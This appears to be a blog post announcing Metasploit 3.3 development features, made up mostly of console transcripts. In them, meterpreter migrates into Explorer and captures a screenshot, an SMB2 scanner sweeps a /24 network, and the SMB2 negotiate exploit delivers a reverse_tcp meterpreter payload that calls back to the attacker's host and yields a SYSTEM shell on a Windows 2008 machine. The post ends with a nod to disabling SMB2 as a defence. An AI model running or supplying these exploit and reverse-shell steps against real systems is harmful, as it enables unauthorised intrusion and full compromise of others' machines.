Metasploit 3.3 Development Updates

meterpreter > ps

Process list

============

PID Name Path

--- ---- ----

204 iexplore.exe C:/Program Files/Internet Explorer/iexplore.exe

[ snipped ]

1736 Explorer.EXE C:/WINDOWS/Explorer.EXE

3348 sol.exe C:/WINDOWS/system32/sol.exe

meterpreter > migrate 1736

[*] Migrating to 1736...

[*] Migration completed successfully.

meterpreter > screenshot /tmp/boom.bmp

[*] Image saved to /tmp/boom.bmp

Opening browser to image.

<a href="http://2.bp.blogspot.com/_zhDBubx8Wns/SsA_4shJItI/AAAAAAAAAHo/Njt1RnUCojg/s1600-h/woot.png"></a>

msf&gt; use auxiliary/scanner/smb/smb2

msf (auxiliary/smb2) &gt; set RHOSTS 192.168.0.0/24

msf (auxiliary/smb2) &gt; set THREADS 100

msf (auxiliary/smb2) &gt; run

[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours

[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours

When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.

Now that we have identified two systems with SMB2 enabled, its exploit time!

msf&gt; use exploit/windows/smb/smb2_negotiate_func_index

msf (exploit/smb2) &gt; set PAYLOAD windows/meterpreter/reverse_tcp

msf (exploit/smb2) &gt; set LHOST 192.168.0.136

msf (exploit/smb2) &gt; set LPORT 5678

msf (exploit/smb2) &gt; set RHOST 192.168.0.211

msf (exploit/smb2) &gt; exploit

[*] Started reverse handler

[*] Connecting to the target (192.168.0.211:445)...

[*] Sending the exploit packet (854 bytes)...

[*] Waiting up to 180 seconds for exploit to trigger...

[*] Sending stage (719360 bytes)

[*] Meterpreter session 2 opened (192.168.0.136:5678 -&gt; 192.168.0.211:49158)

meterpreter &gt; sysinfo

Computer: WIN-UAKGQGDWLX2

OS : Windows 2008 (Build 6001, Service Pack 1).

Arch : x86

Language: en_US

meterpreter &gt; getuid

Server username: NT AUTHORITY/SYSTEM

Voila! A great way to justify disabling SMB2 across your network.

C:/&gt; framework-3.3-dev-mini.exe /S /D=C:/metasploit33dev